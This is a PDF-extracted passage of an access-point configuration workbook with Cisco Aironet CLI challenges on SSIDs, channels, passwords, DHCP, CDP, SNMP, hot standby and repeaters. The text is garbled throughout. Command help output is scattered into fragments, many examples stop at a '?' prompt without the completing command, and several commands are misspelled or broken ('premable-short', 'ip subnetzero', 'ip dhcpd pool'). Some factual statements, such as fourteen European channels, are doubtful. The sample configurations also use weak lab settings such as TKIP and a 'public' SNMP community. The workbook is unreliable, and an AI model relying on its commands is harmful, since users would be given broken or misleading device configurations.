basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0
48.0 54.0
Active Rates: basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0
54.0
Allowed Rates: 1.0 2.0 5.5 6.0 9.0 11.0 12.0 18.0 24.0 36.0 48.0 54.0
Best Range Rates: basic-1.0 2.0 5.5 6.0 9.0 11.0 12.0 18.0 24.0 36.0 48.0 54.0
Best Throughput Rates:
basic-1.0 basic-2.0 basic-5.5 basic-6.0 basic-9.0 basic-11.0
basic-12.0 basic-18.0 basic-24.0 basic-36.0 basic-48.0 basic-54.0
Default Rates:
basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0
48.0 54.0
Current Voice Rates:
5.5 6.0 11.0 12.0 24.0 [disabled until voice packet-discard
enabled]
Default Voice Rates: 5.5 6.0 11.0 12.0 24.0
Channel / Max Power Table
1 O=15 D=17,
2 O=15 D=17,
3 O=15 D=17,
4 O=15 D=17,
5 O=15 D=17
6 O=15 D=17,
7 O=15 D=17,
8 O=15 D=17,
9 O=15 D=17,
10 O=15 D=17
11 O=15 D=17,
12 O=15 D=17,
13 O=15 D=17
Data Rate Sensitivity (rate, SNR dB, Contention dBm)
( 1.0, 1, -98)
( 2.0, 7, -94)
( 5.5, 9, -92)
( 6.0, 7, -92)
( 9.0, 14, -87)
(12.0, 12, -87)
NetworkSims.com
(11.0, 16, -86)

(18.0, 15, -84)
342
(24.0, 17, -82)

(36.0, 24, -76)
(48.0, 29, -73)
(54.0, 33, -69)
Radio Management (RM) Configuration:
Regular AP RM Mode 1
Temp Setting Disabled
Temp Settings: AP Tx Power 0
AP Tx Channel 0
Client Tx Power 0
ap# show running-config
Using 1413 out of 32768 bytes
!
version 12.3
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname ap
!
enable secret 5 $1$a2Og$asLICPwL7.HnsvvykNOus1
!
ip subnet-zero
ip domain name test.com
!
!
username Cisco password 7 1531021F0725
!
bridge irb
!
!
interface Dot11Radio0
no ip address
no ip route-cache
!
encryption mode ciphers tkip
!
ssid bill
!
speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0
station-role root
world-mode legacy
bridge-group 1
bridge-group 1 subscriber-loop-control
bridge-group 1 block-unknown-source
no bridge-group 1 source-learning
no bridge-group 1 unicast-flooding
bridge-group 1 spanning-disabled
!
interface FastEthernet0
no ip address
no ip route-cache
duplex auto
speed auto
bridge-group 1
bridge-group 1 spanning-disabled
hold-queue 160 in
!
interface BVI1
ip address 10.0.0.1 255.255.255.0
no ip route-cache
!
ip http server
no ip http secure-server
ip http help-path http://www.cisco.com/warp/public/779/smbiz/prodconfig/help/eag
!
!
control-plane
!
bridge 1 route ip
!
NetworkSims.com
343
!
!
line con 0
line vty 0 4
login local
!
end
# config t
(config)# int bvi 1
ap(config-if)# ip address ?
A.B.C.D IP address
pool
IP Address autoconfigured from a local DHCP pool
ap(config-if)# ip address 158.234.223.7 ?
(config-if)# description cisco
(config-if)# int fa0
(config-if)# int d0
Explanation
One of the most popular access points for creating infrastructure networks is the Cisco
Aironet 1200 device, which is an industry-standard wireless access point. It has two main
networking ports: radio port named Dot11radio0 (D0) and an Ethernet one (E0 or FA0).
Each of these ports can programmed with an IP address, but a special port named BVI1 is
normally used to define the IP address for both ports. Figure 1 outlines this, and how the
port is programmed.
... diagrams missed out in this version

Outline
This challenge involves the configuration of the E0 interface.
Objectives

Enable E0.
Define the description of the E0 port.
Define Ethernet details on the E0 port.
NetworkSims.com
344
Enable CDP on E0.
Example
> enable
# config t
(config)# int bvi1
(config-if)# description cisco
(config-if)# int fa0
(config-if)# cdp ?
log

Outline
This challenge involves the configuration of a few details including the hostname and
default gateway.
Objectives

Enable D0.
Example
> en
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# exit
(config)# hostname oslo
oslo (config)# ip default-gateway ?
oslo (config)# ip default-gateway 136.182.33.11
NetworkSims.com
345
oslo (config)#
Explanation
Another important configuration is the default-gateway which is used in order to redirect
any data packets which are not destined for the local network. For this the wireless access
point will send these data packets which have an unknown destination to the default
gateway, which will, hopefully, find a destination for them, or at least know of another
router which might be able to help on routing the packets. In most cases the defaultgateway is defined as the IP address of the router port which connects to the Ethernet
connection of the wireless access point. An example configuration is:
# config t
(config)# ip ?
(config)# exit

Outline
This challenge involves the configuration an SSID and the radio channel. Also it defines the
default gateway, the domain name and the hostname. Note there is a change in Cisco IOS
12.3.
Objectives
Define the SSID on the radio port.

Define the radio channel.
Define the domain name.
Example IOS Version 12.3

> en
# config t
(config)# dot11 ssid minnesota
(config-ssid)# ?
ssid configuration commands:
accounting
radius accounting
admit-traffic
admit traffic
authentication
authentication method
exit
Exit from ssid sub mode
NetworkSims.com
346
guest-mode
guest ssid
information-element Add information element
infrastructure-ssid ssid used to associate to other infrastructure devices
ip
IP options
max-associations
set maximum associations for ssid
mbssid
Multiple BSSID
mobility
enable L3 mobility
no
vlan
bind ssid to vlan
wpa-psk
Configure Wi-Fi Protected Access pre-shared key
(config-ssid)# exit
(config)# int d0
(config-if)# ssid ?
LINE radio Service Set ID (Up to 32 characters)
(config-if)# ssid minnesota
(config-if)# int d0
(config-if)# channel ?
<1-2472>
One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427
2432 2437 2442 2447 2452 2457 2462 2467 2472
least-congested Scan for best frequency
(config-if)# channel 1
(config-if)# exit
(config)# ip domain-name ?
(config)# ip domain-name moray.ll
(config)# hostname northdakota
Note that the setting of SSID is now done in the global configuration mode, and the SSID is
then associated with the D0 port.
> en
# config t
(config)# int d0
(config-if)# ssid minnesota
(config-if-ssid)# exit
(config-if)# int d0
<1-2472>
One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427
2432 2437 2442 2447 2452 2457 2462 2467 2472
(config-if)# exit
(config)# ip domain-name moray.ll
(config)# hostname northdakota
Explanation
The radio SSID (Service Set ID) uniquely identifies a wireless network within a limited
physical domain. It is setup within the access point with:
# config t
(config)# int dot11radio0
(config-if)# ssid fred
(config-if-ssid)# guest-mode
NetworkSims.com
347
which sets up an SSID of fred, and allows guest-mode. Along with the SSID it is also
possible to define a beacon time where a beacon signal is sent out at a given time interval,
such as:
# config t
(config-if)# beacon ?
dtim-period
dtim period
period
beacon period
(config-if)# beacon period ?
<20-4000> Kusec (or msec)
(config-if)# beacon period 1000
which defines the beacon period of 1000 ms (1 seconds).

The channel setting is an important one, as it defines the basic identification of the
communications channel. In Europe there are 14 channels available which limits the number
of simultaneous connections, where each channel is numbered from 1 to 14, each of which
has their own transmission/reception frequency, as illustrated in Figure 1. Careful planning
of these channels is important, especially in creating wireless domains which are
overlapping as this allows users to roam around the physical space. The example in Figure 1
shows that it is possible to achieve good coverage, without overlapping domains with the
same frequency, with just three channels.
channel 12412
channel 22417
channel 32422
channel 42427
channel 52432
channel 62437
channel 72442
channel 82447
channel 92452
channel 102457
channel 112462
channel 122467
channel 132472
channel 142484
13
13
1
Figure 1
Channels in an area
The definition of the channel is defined within the D0 interface:

<1-2472>
One of: 1 2 3 4 5 6 7 8 9 10 11 12 13 2412 2417 2422 2427
2432 2437 2442 2447 2452 2457 2462 2467 2472
NetworkSims.com
348

Outline
This challenge involves the configuration of passwords and a user.
Objectives
Define the privileged and secret passwords.

Define a user and password.
Example
> en
# config t
(config)# enable ?
last-resort Define enable action if no TACACS servers respond
password
Assign the privileged level password
secret
Assign the privileged level secret
use-tacacs
Use TACACS to check enable passwords
ap(config)# enable password ?
0
7
LINE
The UNENCRYPTED (cleartext) 'enable' password
level Set exec level password
(config)# enable password hotel
ap(config)# enable sec ?
0
5
Specifies an ENCRYPTED secret will follow
LINE
The UNENCRYPTED (cleartext) 'enable' secret
level Set exec level password
(config)# enable secret hotel
(config)# username lynn password foxtrot
(config)# ip subnetzero
Explanation
A wireless access point is typically accessible through the TELNET and/or HTTP proposal.
The HTTP service is important as it allows remote access through a Web browser, and can
be authenticated locally with:
# config t
(config) # username ?
(config) # username fred password bert
NetworkSims.com
349
(config)
(config)
(config)
(config)
#
#
#
#
ip http ?
ip http server
ip http authentication local
exit

Outline
This challenge involves the configuration of radio port settings. Note there is a change in
Cisco IOS 12.3.
Objectives
Define the privileged and secret passwords.

Define a user and password.

> enable
# config t
(config)# dot11 ssid fred
(config-ssid)# max-assoc ?
<1-255> association limit
(config-ssid)# max-assoc 9
(config-ssid)# exit
(config)# int bvi1
(config-if)# int d0
dtim-period dtim period
period
beacon period
(config-if)# power ?
client Client radio transmitter power level
local
Local radio transmitter power level
(config-if)# power local ?
<1-50>
One of: 1 5 20 30 50
maximum Set local power to allowed maximum
(config-if)# power local 5
(config-if)# power client ?
<1-50>
One of: 1 5 20 30 50
maximum Set client power to allowed maximum
(config-if)# power client 5
NetworkSims.com
350
(config-if)# ?
access-expression
antenna
dot11 radio antenna setting
arp
bandwidth
beacon
dot11 radio beacon
bridge-group
broadcast-key
Configure broadcast key rotation period
carrier-delay
cdp
channel
Set the radio frequency
countermeasure
countermeasure
custom-queue-list
dampening
default
delay
description
dot11
IEEE 802.11 config interface commands
dot1x
IEEE 802.1X subsystem
encryption
Configure dot11 encryption parameters
exit
fair-queue
fragment-threshold
IEEE 802.11 packet fragment threshold
help
hold-queue
infrastructure-client
Reserve a dot11 virtual interface for a WGB client
--More------ press any key --ip
keepalive
Enable keepalive
l2-filter
Set Layer2 ACL for packet received by upper layer
protocols
load-interval
interface
logging
loopback
mac-address
mtu
no
ntp
Configure NTP
packet
max packet retries
parent
Specify parents with which to associate
payload-encapsulation
IEEE 802.11 packet encapsulation
power
Set radio transmitter power levels
preamble-short
Use 802.11 short radio preamble
priority-group
random-detect
Interface
rts
dot11 Request To Send
service-policy
shutdown
snmp
speed
Set allowed radio bit rates
--More------ press any key --ssid
Configure radio service set parameters
station-role
role of the radio
timeout
traffic-class
Radio traffic class parameters
transmit-interface
interface
tx-ring-limit
world-mode
Dot11 radio world mode
NetworkSims.com
351
(config-if)#
<cr>
(config-if)#
(config-if)#
(config-if)#
1.0
11.0
2.0
5.5
basic-1.0
basic-11.0
basic-2.0
basic-5.5
range
throughput
<cr>
(config-if)#
(config-if)#
world-mode ?
world-mode
no shut
speed ?
Allow 1 Mb/s rate
Allow 11 Mb/s rate
Allow 2 Mb/s rate
Allow 5.5 Mb/s rate
Require 1 Mb/s rate
Require 11 Mb/s rate
Require 2 Mb/s rate
Require 5.5 Mb/s rate
Set rates for best range
Set rates for best throughput
speed 1.0
ssid fred

> enable
# config t
(config)# int bvi1
(config-if)# int d0
period
beacon period
client Client radio transmitter power level
local
Local radio transmitter power level
<1-50>
One of: 1 5 20 30 50
<1-50>
One of: 1 5 20 30 50
(config-if)# ?
access-expression
antenna
dot11 radio antenna setting
arp
bandwidth
beacon
dot11 radio beacon
bridge-group
broadcast-key
Configure broadcast key rotation period
carrier-delay
cdp
channel
Set the radio frequency
countermeasure
countermeasure
custom-queue-list
dampening
NetworkSims.com
352
default
delay
description
dot11
IEEE 802.11 config interface commands
dot1x
IEEE 802.1X subsystem
encryption
Configure dot11 encryption parameters
exit
fair-queue
fragment-threshold
IEEE 802.11 packet fragment threshold
help
hold-queue
infrastructure-client
Reserve a dot11 virtual interface for a WGB client
--More------ press any key --ip
keepalive
Enable keepalive
l2-filter
protocols
load-interval
interface
logging
loopback
mac-address
mtu
no
ntp
Configure NTP
packet
max packet retries
parent
Specify parents with which to associate
payload-encapsulation
IEEE 802.11 packet encapsulation
power
Set radio transmitter power levels
preamble-short
Use 802.11 short radio preamble
priority-group
random-detect
Interface
rts
dot11 Request To Send
service-policy
shutdown
snmp
speed
Set allowed radio bit rates
--More------ press any key --ssid
Configure radio service set parameters
station-role
role of the radio
timeout
traffic-class
Radio traffic class parameters
transmit-interface
interface
tx-ring-limit
world-mode
Dot11 radio world mode
(config-if)#
<cr>
(config-if)#
world-mode ?
world-mode
(config-if)# speed ?
1.0
Allow 1 Mb/s rate
11.0
Allow 11 Mb/s rate
2.0
Allow 2 Mb/s rate
5.5
Allow 5.5 Mb/s rate
basic-1.0
Require 1 Mb/s rate
basic-11.0 Require 11 Mb/s rate
basic-2.0
Require 2 Mb/s rate
basic-5.5
Require 5.5 Mb/s rate
NetworkSims.com
353
range
Set rates for
throughput Set rates for
<cr>
(config-if)# speed 1.0
(config-if-ssid)# max-assoc
(config-if-ssid)# max-assoc
best range
best throughput
?
9

Outline
This challenge involves the configuration of the D0 parameters, such as the role of the
station, the antenna settings, the SSID and guest-mode. Note there is a change in Cisco IOS
12.3.
Objectives
Define the station role.

Define the antenna settings.
Define the SSID.
Enable guest-mode on the SSID.

> enable
# config t
(config)# dot11 ssid michigan
(config-ssid)# guest-mode
(config-ssid)# exit
(config)# int bvi1
(config)# int d0
(config-if)# station ?
repeater Repeater access point
root
Root access point
(config-if)# station root
(config-if)# antenna ?
receive
receive antenna setting
transmit transmit antenna setting
(config-if)# antenna receive ?
diversity antenna diversity
left
antenna left
right
antenna right
(config-if)# antenna receive diversity
(config-if)# antenna transmit left
(config-if)# ssid michigan
NetworkSims.com
354
> enable
# config t
(config)# int bvi1
(config)# int d0
root
Root access point
(config-if)# station root
(config-if)# antenna ?
receive
receive antenna setting
transmit transmit antenna setting
(config-if)# antenna receive ?
diversity antenna diversity
left
antenna left
right
antenna right
(config-if)# antenna receive diversity
(config-if)# antenna transmit left
(config-if)# ssid michigan
(config-if-ssid)# guest-mode

Outline
This challenge involves the configuration of the D0 parameters, such as the rts settings,
fragmentation settings, and the radio channel. Note there is a change in Cisco IOS 12.3.
Objectives
Define RTS (ready to send) settings.

Define the SSID.
Define the maximum associations for the SSID.

> enable
# config t
(config)# dot11 ssid oklahoma
(config-ssid)# exit
(config)# int bvi1
(config)# int d0
(config-if)# ssid oklahoma
(config-if)# rts ?
retries
RTS max retries
threshold RTS threshold
(config-if)# rts threshold ?
NetworkSims.com
355
<0-2347> threshold in bytes

(config-if)# rts threshold 19
(config-if)# rts retries 24
(config-if)# fragment ?
<256-2346>
(config-if)# fragment 1091

> enable
# config t
(config)# int bvi1
(config)# int d0
(config-if)# rts ?
retries
RTS max retries
(config-if-ssid)# max-assoc 24
<256-2346>

Outline
This challenge involves the configuration of the D0 parameters, such as for packet retries,
preamble settings, fragment limit and the radio channel. Note there is a change in Cisco IOS
12.3.
Objectives
Define packet retry settings.

Define the SSID.
Define the maximum associations for the SSID.

> enable
# config t
(config)# dot11 ssid oklahoma
NetworkSims.com
356
(config-ssid)# exit
(config)# int bvi1
(config)# int d0
(config-if)# packet ?
retries retries
(config-if)# packet retries ?
<1-128> max packet retries before giving up
(config-if)# packet retries 7
(config-if)# premable-short
<256-2346>

> enable
# config t
(config)# int bvi1
(config)# int d0
(config-if)# packet ?
retries retries
(config-if)# packet retries ?
<1-128> max packet retries before giving up
(config-if)# packet retries 7
(config-if)# premable-short
<256-2346>

Outline
This challenge involves the configuration of the DHCP server on the wireless access point.
Objectives
Define the DHCP pool.

Define the network addresses.
Define the DNS server.
Define the NetBIOS server.
Define the lease time.
NetworkSims.com
357
Define the default router.

Define excluded addresses.
Example
The following sets up the DHCP server:
> en
# config t
(config)# ip dhcpd pool Wyoming
(dhcp-config)# ?
DHCP pool configuration commands:
accounting
Send Accounting Start/Stop messages
bootfile
Boot file name
class
Specify a DHCP class
client-identifier
Client identifier
client-name
Client name
default-router
Default routers
dns-server
DNS servers
domain-name
Domain name
exit
Exit from DHCP pool configuration mode
hardware-address
Client hardware address
host
Client IP address and mask
import
Programatically importing DHCP option parameters
lease
Address lease time
netbios-name-server NetBIOS (WINS) name servers
netbios-node-type
NetBIOS node type
network
Network number and mask
next-server
Next server in boot process
no
option
Raw DHCP options
origin
Configure the origin of the pool
subnet
Subnet allocation commands
update
Dynamic updates
utilization
Configure various utilization parameters
vrf
Associate this pool with a VRF
(dhcp-config)# n?
netbios-name-server netbios-node-type network next-server
no
(dhcp-config)# network ?
A.B.C.D Network number in dotted-decimal notation
(dhcp-config)# dns ?
Hostname or A.B.C.D Server's name or IP address
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
(config)# ip dhcp excluded-address ?
A.B.C.D Low IP address
NetworkSims.com
358
(config)# ip dhcp excluded-address 249.189.108.26 ?

A.B.C.D High IP address
<cr>
(config)# ip dhcp excluded-address 249.189.108.26

Outline
This challenge involves the configuration of an IP hosts table.
Objectives
Define a default gateway.

Define a hostname.
Define a hosts table.
Example
The following sets up an IP hosts table:
> en
# config t
(config)# hostname Montana
montana (config)# ip host ?
WORD Name of host
montana (config)# ip host tennessee ?
<0-65535>
A.B.C.D
Host IP address

Outline
This challenge involves the configuration of CDP (Cisco Discovery Protocol).
NetworkSims.com
359
Objectives
Enable CDP.
Define CDP holdtime.
Define CDP timer.
Apply CDP onto E0.
Example
The following sets up CDP:
# config t
(config)# cdp ?
advertise-v2
CDP sends version-2 advertisements
holdtime
source-interface Insert the interface's IP in all CDP packets
timer
run
(config)# cdp run
(config)# cdp holdtime ?
(config)# int e0
Explanation
CDP (Cisco Discovery Protocol) is used to discover Cisco devices which connect to a given
port. It is set globally on the device with cdp run, and then the timers are set as:
# config t
(config)# cdp
(config)# cdp
(config)# cdp
(config)# cdp
(config)# cdp
(config)# end
?
holdtime ?
holdtime 120
timer ?
timer 50
To enable CDP on the wireless access point:

# config t
(config)# cdp run
(config)# end
To enable CDP on an interface:
NetworkSims.com
360
# config t
(config)# int fa0
(config-if)# cdp ?
(config-if)# end
To show CDP information:

#
#
#
#
show
show
show
show
cdp
cdp
cdp
cdp
?
neighbors
neighbors detail
neighbors traffic

Outline
This challenge involves the configuration of HTTP server details.
Objectives

Define the HTTP server port.
Define the HTTP authentication.
Enable various banners.
Example
The following sets up the HTTP server parameters:
> en
# config t
(config)# ip http ?
access-class
authentication
client
help-path
HTTP help root URL
max-connections
path
port
secure-port
secure-server
secure-trustpoint
server
Enable http server
timeout-policy
NetworkSims.com
361
<0-65535> HTTP port

local
(config)# ip http help-path ?
WORD root URL for help pages
(config)# ip http help-path file:///c:\wireless\help
(config)# banner motd gorgie home
(config)# banner login welcome
(config)# banner exec admin device

Outline
This challenge involves the configuration of console and Telnet parameters.
Objectives
Define the console password.

Define the timeout for the console.
Define the Telnet password.
Define the timeout for Telnet sessions.
Example
The following sets up the CON and VTY settings:
> en
# config t
(config-line)# ?
Line configuration commands:
access-class
Filter connections based on an IP access list
activation-character
Define the activation character
autocommand
Automatically execute an EXEC command
autocommand-options
Autocommand options
data-character-bits
Size of characters being handled
databits
Set number of data bits per character
default
domain-lookup
Enable domain lookups in show commands
editing
Enable command line editing
escape-character
Change the current line's escape character
exec
Configure EXEC
exec-banner
Enable the display of the EXEC banner
exec-character-bits
Size of characters to the command exec
exec-timeout
Set the EXEC timeout
exit
Exit from line configuration mode
NetworkSims.com
362
flowcontrol
full-help
help
history
international
ip
length
location
logging
login
modem
monitor
motd-banner
no
notify
padding
parity
password
privilege
refuse-message
rotary
rxspeed
session-timeout
Set the flow control

Provide help to unprivileged user
Enable and control the command history function
Enable international 8-bit character support
IP options
Set number of lines on a screen
Enter terminal location description
Modify message logging facilities
Enable password checking
Configure the Modem Control Lines
Copy debug output to the current terminal line
Enable the display of the MOTD banner
Inform users of output from concurrent sessions
Set padding for a specified output character
Set terminal parity
Set a password
Change privilege level for line
Define a refuse banner
Add line to a rotary group
Set the receive speed
Set interval for closing connection when there is no
input traffic
special-character-bits Size of the escape (and other special) characters
speed
Set the transmit and receive speeds
start-character
Define the start character
stop-character
Define the stop character
stopbits
Set async line stop bits
terminal-type
Set the terminal type
timeout
Timeouts for the line
transport
Define transport protocols for line
txspeed
Set the transmit speeds
vacant-message
Define a vacant banner
width
Set width of the display terminal
(config-line)# logging ?
(config-line)# logging synchronous

Outline
This challenge involves the configuration of a loopback address, and a few other settings.
NetworkSims.com
363
Objectives
Set the clock.

Allow zero subnets.
Define a DHCP pool.
Define the E0 IP address and subnet mask.
Define a loopback address and subnet mask.
Example
The following sets up loopback settings:
> en
# clock ?
# clock set 03:52
# config t
(config)# ip dhcp pool ion
(config)# int e0
(config-if)# exit
(config)# int loopback ?
<0-2147483647> Loopback interface number
(config)# int loopback 45

Outline
Objectives
Enable logging.
Define logging levels.
Example
NetworkSims.com
364
> enable
# config t
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
informational
(severity=6)
notifications
warnings
Warning conditions
(severity=4)
xml
Enable logging in XML to XML logging buffer
<cr>
<0-7>
alerts
(severity=1)
critical
Critical conditions
(severity=2)
debugging
Debugging messages
(severity=7)
emergencies
System is unusable
(severity=0)
errors
Error conditions
(severity=3)
(severity=6)
warnings
Warning conditions
(severity=4)
<cr>

Outline
This challenge involves the configuration of services.
Objectives
Define logging timestamps.

Disable UDP small servers.
Disable TVP small servers.
Define that passwords are encrypted.
Example
NetworkSims.com
365
> en
# config t
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
linenumber
nagle
old-slip-prompts
pad
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in

Enable PAD commands
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
log
<cr>
uptime
<cr>
(config)# service ?
compress-config
config
dhcp
exec-callback
exec-wait
finger
hide-telnet-addresses Hide destination addresses in telnet command
linenumber
nagle
old-slip-prompts
pad
Enable PAD commands
password-encryption
prompt
pt-vty-logging
sequence-numbers
slave-log
tcp-keepalives-in
connections
tcp-keepalives-out
connections
tcp-small-servers
telnet-zeroidle
timestamps
udp-small-servers
NetworkSims.com
366


Outline
This challenge involves the configuration of the SNMP server.
Objectives
Define SNMP community string.

Define SNMP contact.
Define SNMP location.
Enable SNMP traps.
Example
The following sets up the SNMP settings:
# config t
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
location
manager
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
NetworkSims.com
367
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
location
manager
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
traps
Enable SNMP Traps
Explanation
SNMP (Simple Network Management Protocol) is a well-supported standard which can be
used to monitor and control devices. It typically runs of hubs, switches and bridges. Many
SNMP devices provides both general network management and device management
through a serial cable, modem, or over the network from a remote computer. It involves a
primary management station communicating with different management processes. Figure
1 shows an out-line of an SNMP-based system. A SNMP agent runs SNMP management
software. An SNMP server sends commands to the agent which responses back with the
results. In this figure the server asks the agent for its routing information and the agent
responds with its routing table. These responses can either be polled (the server sends a
request for information) or interrupt-driven (where the agent sends its information at given
events). A polled system tends to increase network traffic as the agent may not have any
updated information (and the server must re-poll for the information).
The SNMP (Simple Network Management Protocol) protocol is initially based in the
RFC1157 document. It defines a simple protocol which gives network element management
information base (MIB). There are two types of MIB: MIB-1 and MIB-2. MIB-1 was defined
in 1988 and has 114 table entries, divided into two groups. MIB-2 is a 1990 enhancement
which has 171 entries organized into 10 groups (RFC 1213). Most devices are MIB-1
compliant and newer one with both MIB-1 and MIB-2.
The database contains entries with four fields:
Object type. Defines the name of the entry.

Syntax. Gives the actual value (as string or an integer).
Access field. Defines whether the value is read-only, read/write, write-only and not
NetworkSims.com
368
accessible.
Status field. Contains an indication on whether the entry in the MIB is mandatory (the
managed device must implement the entry), optional (the managed device may
implement the entry) or obsolete (the entry is not used).
SNMP is a very simple protocol but suffers from the fact that it is based on connectionless,
unreliable, UDP. The IAB have recommended that the Common Management Information
Services (CMIS) and Common Management Information Protocol (CMIP) be accepted as
standard for future TCP/IP systems. The two main version of SNMP are SNMP Ver1 and
SNMP Ver2. SNMP has added security to stop intruders determining network loading or
the state of the network.
The SNMP architecture is based on a collection of:
Network management stations. These execute management applications which monitor

and control network elements.
Network elements. These are devices such as hosts, gateways, terminal servers, and so
on and have management agents which perform network management functions
replying to requests from network management stations.
Routing information?
SNMP-managed devices
(runs managed agent software)
Routing table
SNMP
SNMP
agent
agent
SNMP
SNMP
agent
agent
SNMP
SNMP
agent
agent
MIB
MIB
MIB
Figure 1
SNMP
SNMP
server
server
software
software
SNMP architecture
SNMP on a wireless access point

The SNMP (Simple Network Management Protocol) is a powerful method of gaining
information on the operation of the network. The snmp-server command is used to enable
SNMP monitoring. The snmp-server community command is used to initialise SNMP, and
set the community string (which is basically used as a type of password for the SNMP
access). For example to define the read-only string to public:
NetworkSims.com
369
# config t
(config)# snmp-server community public RO
The RO defines read-only access, while RW defines read-write access. To setup the SNMP
contact, the location:
(config)# snmp-server contact fred smith
(config)# snmp-server location room c6
SNMP contains a database of monitored network conditions, such as the number of errors in
data packets, the IP addresses of the interfaces, and so on. It can also be setup to trigger on
certain traps, such as on syslog traps. To enable all of SNMP traps so that all the data is
monitored:
Then to send these traps to a remote host (to www.myhost.com):

# config t
(config)# snmp-server host www.myhost.com public
To determine the status of the SNMP communications:

# show snmp
and to display the SNMP engine and remote engines:

# show snmp engine
and to display the SNMP group:

# show snmp group
SNMP uses an MIB database to store its values. To display its contents:
# show snmp mib
SNMP tree structure

The MIB tree structure is defined by a long sequence of numbers separated by dots, such as
.1.3.6.1.2.1.1.4.0 (where the .0 represents an end node). This number is called an Object
Identifier (OID). The OID is a numerical representation of the MIB tree structure. Each digit
represents a node in this tree structure. The trunk of the tree is on the left; the leaves are on
the right, as illustrated in Figure 2 and Figure 3.
NetworkSims.com
370
.1 System MIB
.1.3.6.1.2.1.1.4.0
.0 - CCITT
.1 ISO
.3 ISO
.6 DOD
.1 Internet
.1 Directory
.2 Management
.3 Experimental
.4 Private
Figure 2 SNMP object ID
.1.3.6.1.2.1.1.4.0
sysDescr (1), sysObjectID (2),
sysUpTime (3), sysContact (4),
sysName (5), sysLocation (6),
sysServices (7),
Figure 3 SNMP object ID
For example a node with an ID of 1.3.6.1.2.1.5.1.0 has the following structure:
iso(1).
org(3).
dod(6).
internet(1).
mgmt(2).
mib-2(1).
icmp(5).
icmpInMsgs(1).
For a router, example objects are:

MIB name
sysName
sysUpTime
sysDescr
sysContact
sysLocation
ciscoImageString
avgBusy1
avgBusy5
NetworkSims.com
Description
Hostname
Uptime
System Description
System Contact
System Location
IOS Version
1-Minute CPU Util.
5-Minute CPU Util.
Object ID
.1.3.6.1.2.1.1.5.0
.1.3.6.1.2.1.1.3.0
.1.3.6.1.2.1.1.1.0
.1.3.6.1.2.1.1.4.0
.1.3.6.1.2.1.1.6.0
.1.3.6.1.4.1.9.9.25.1.1.1.2.5
.1.3.6.1.4.1.9.2.1.57.0
.1.3.6.1.4.1.9.2.1.58.0
371
freeMem
ciscoImageString.4
Free memory
IOS feature set
.1.3.6.1.4.1.9.2.1.8.0
.1.3.6.1.4.1.9.9.25.1.1.1.2.4

Outline
This challenge involves the configuration of the hot standby.
Objectives
Define the BVI IP address and subnet mask.

Define the MAC address of the device to monitor.
Define the poll-time for the hot standby.
Define the timeout for the host standby.
Example
The following sets up the hot standby function:
> en
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# int e0
(config-if)# exit
(config)# iapp ?
standby Configure AP standby mode parameters
(config)# iapp standby ?
mac-address
MAC address of the primary AP
poll-frequency
Standby polling frequency
primary-shutdown Shutdown primary radios on failover
timeout
Standby polling timeout
<cr>
(config)# iapp standby mac ?
H.H.H MAC address of the primary AP Radio
(config)# iapp standby mac-address 00e0.9143.5615
(config)# iapp standby timeout ?
<5-600> Standby polling timeout in seconds
(config)# iapp standby timeout 234
(config)# iapp standby poll-frequency ?
<1-30> Standby polling frequency in seconds
(config)# iapp standby poll-frequency 11
(config)# iapp standby primary-shutdown ?
<cr>
Explanation
NetworkSims.com
372
The hot standby function is used to provide a backup to another access point, and is
configured in the same way, so that it is fails, the hot standby device can become active, and
associates the active clients, automatically. The only setting that will differ is the IP address
of the device. In the following configuration, the MAC address of the device to be
monitored is 1111.abcd.ef10. The timeout period in which the device will determine if the
monitored device has stopped working is five seconds, and the poll time is two seconds:
# config t
(config)# iapp standby mac 1111.abcd.ef10
(config)# iapp standby timeout 5
(config)# iapp standby polltime 2
The hot standby device has a different IP address (as it may cause a conflict when the two
devices are operating at the same time, but, for the sake of seamless operation, the hot
standby device must be setup with the following settings by identical:
-
SSID.
IP Subnet Mask.
Default gateway.
Data rates.
Encryption and authentication settings.
... diagrams missed out in demo version

Outline
This challenge involves the configuration of a repeater.
Objectives
Define the BVI address and subnet mask.

Define a repeater role.
Define the parent MAC address.
Setup infrastructure-SSID.

The following sets up the repeater:
NetworkSims.com
373
> en
# config t
(config)# dot11 ssid mississippi
(config-ssid)# infrastructure-ssid
(config-ssid)# exit
(config)# int bvi1
(config-if)# int d0
(config-if)# ssid mississippi
non-root
Non-root (bridge)
repeater
Repeater access point
root
Root access point or bridge
scanner
Scanner access point
workgroup-bridge Workgroup Bridge
(config-if)# station repeater
(config-if)# parent ?
<1-4>
Parent number
timeout Time in seconds to look for parent
(config-if)# parent 1 ?
H.H.H Parent MAC addr
(config-if)# parent 1 00e0.4e3d.c533 ?
<cr>
(config-if)# parent 1 00e0.4e3d.c533
(config-if)# parent timeout ?

The following sets up the repeater:
> en
# config t
(config)# int bvi1
(config-if)# int d0
(config-if)# ssid mississippi
(config-if-ssid)# infrastructure-ssid
root
Root access point
(config-if)# station repeater
<1-4>
Parent number
(config-if)# parent 1 00e0.4e3d.c533 ?
<cr>
(config-if)# parent 1 00e0.4e3d.c533

Outline
NetworkSims.com
374
